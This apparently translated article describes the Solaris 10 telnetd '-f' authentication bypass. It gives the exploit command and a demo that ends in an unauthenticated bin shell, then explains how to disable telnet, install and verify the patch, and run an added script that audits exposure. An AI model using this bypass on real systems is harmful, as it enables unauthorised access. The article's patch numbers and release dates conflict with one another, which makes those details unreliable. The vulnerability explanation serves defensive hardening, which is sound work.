Telnet security has always been a key concern, so today we discuss a telnet security vulnerability. First, some background: early versions of Solaris 2.6, 7, and 8 had a telnetd vulnerability in which verification could be bypassed using the TTYPROMPT environment variable of /bin/login, allowing logon without authentication. Recently, telnet on Solaris 10 was found to have a vulnerability, and Sun released a patch in time.
Let's first look at the symptoms of the problem. The system environment where the vulnerability occurs is Solaris 10 or later. The default installation is not selected during installation. The vulnerability is triggered when an argument of the form "-fusername" is passed to the -l option of the Solaris telnet command: the user is then logged on to the Solaris system directly.
Command Format:
- telnet -l "-fbin" target_address
The following is a demonstration of using the telnet security vulnerability to log on to the system as a bin user.
- # telnet -l "-fbin" myhost
- Trying 172.21.60.120...
- Connected to myhost.
- Escape character is '^]'.
- Sun Microsystems Inc. SunOS 5.10 Generic January 2005
- $ id -a
- uid=2(bin) gid=2(bin) groups=2(bin),3(sys)
If the administrator has modified the /etc/default/login file and commented out the CONSOLE line to allow remote root logon, a visitor can use this vulnerability to log on to the system directly as root, which poses even greater harm to the system.
Kingsley first provided the source code of the vulnerability found in OpenSolaris and called it a "0-day" (zero-day) vulnerability. Article address: http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf
A script is provided in that article. After running the script, the user obtains the permissions of the adm user on the system logged on to.
Solution:
1. Disable the telnet service on Solaris 10.
Check whether the local telnet service is enabled.
- # svccfg list | grep telnet
- network/telnet
- # svcs -l network/telnet
- fmri svc:/network/telnet:default
- name Telnet server
- enabled true
- state online
- next_state none
- state_time Mon Feb 26 03:50:13 2007
- restarter svc:/network/inetd:default
Disable the telnet service.
- # svcadm disable svc:/network/telnet:default
2. Download and install the Sun security patch (which must be supported by the Sun service).
The February 13 blog post by Sun technical support engineer Alan Hargreaves: http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit
As mentioned in, the final patch for solving this problem has been released on August 3. You can use the Update Manager of Solaris 10 to download and install the patch. The patch was released on July 15, February 21.
Note that, for Solaris 10, only security and hardware patches can be downloaded free of charge; all other patches require a Sun Service Plan. However, if you know the patch number, you can download the patch individually from http://sunsolve.sun.com. Here, you can use PatchFinder on sunsolve to find and download the 12768-03 patch and install it on the system.
After the patch is installed, the vulnerability can no longer be exploited.
- # showrev -p | grep 120068
- Patch: 120068-01 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd
- Patch: 120068-03 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd
- # telnet -l "-fbin" myhost
- Trying 172.21.60.120...
- Connected to myhost.
- Escape character is '^]'.
- Password:
A password is now required to log on. The telnet security vulnerability in the Solaris 10 system has been fixed.
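The two checks above (service state from `svcs -l network/telnet`, patch level from `showrev -p`) can be combined into one audit result per host. The following is an added example, not part of the original article or of Sun's tooling; the function names are hypothetical, the sample text is constructed in the format of the transcripts above, and the minimum revision (03 here, the revision shown installed on the fixed system) is an assumption that should be confirmed against the vendor advisory.

```shell
#!/bin/sh
# Added example: classify a host from captured `svcs -l network/telnet`
# and `showrev -p` output. Function names are hypothetical.

# telnet_enabled SVCS_TEXT -> "true" only if the "enabled" property is true
# (missing or empty output, e.g. service not installed, counts as "false").
telnet_enabled() {
    printf '%s\n' "$1" |
        awk '$1 == "enabled" { v = $2 } END { print ((v == "true") ? "true" : "false") }'
}

# highest_rev SHOWREV_TEXT PATCH_BASE -> highest installed revision or "none"
highest_rev() {
    printf '%s\n' "$1" | awk -v base="$2" '
        $1 == "Patch:" {
            split($2, p, "-")
            if (p[1] == base && (!seen || p[2] + 0 > max)) { max = p[2] + 0; seen = 1 }
        }
        END { if (seen) printf "%02d\n", max; else print "none" }'
}

# telnet_exposure SVCS_TEXT SHOWREV_TEXT PATCH_BASE MIN_REV
# Prints: disabled (service off), patched (rev >= MIN_REV), or exposed.
telnet_exposure() {
    if [ "$(telnet_enabled "$1")" = "false" ]; then echo disabled; return 0; fi
    rev=$(highest_rev "$2" "$3")
    # Strip one leading zero so "08" is compared as decimal 8.
    if [ "$rev" != "none" ] && [ "${rev#0}" -ge "${4#0}" ]; then
        echo patched
    else
        echo exposed
    fi
}

# Constructed sample input, modelled on the transcripts in this article.
SVCS_ON='fmri         svc:/network/telnet:default
name         Telnet server
enabled      true
state        online'
SHOWREV_OLD='Patch: 120068-01 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd'
SHOWREV_NEW="$SHOWREV_OLD
Patch: 120068-03 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd"

# MIN_REV 03 is an assumption taken from the fixed system shown above.
telnet_exposure "$SVCS_ON" "$SHOWREV_OLD" 120068 03
telnet_exposure "$SVCS_ON" "$SHOWREV_NEW" 120068 03
```

On a live Solaris 10 host the first two arguments would be `"$(svcs -l network/telnet 2>/dev/null)"` and `"$(showrev -p)"`.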
Sun responded quickly to the newly discovered telnet security vulnerability in Solaris 10 and immediately released the corresponding patch. This also shows that every operating system has bugs. Sun uses the open-source OpenSolaris to let system bugs be discovered and fixed as soon as possible.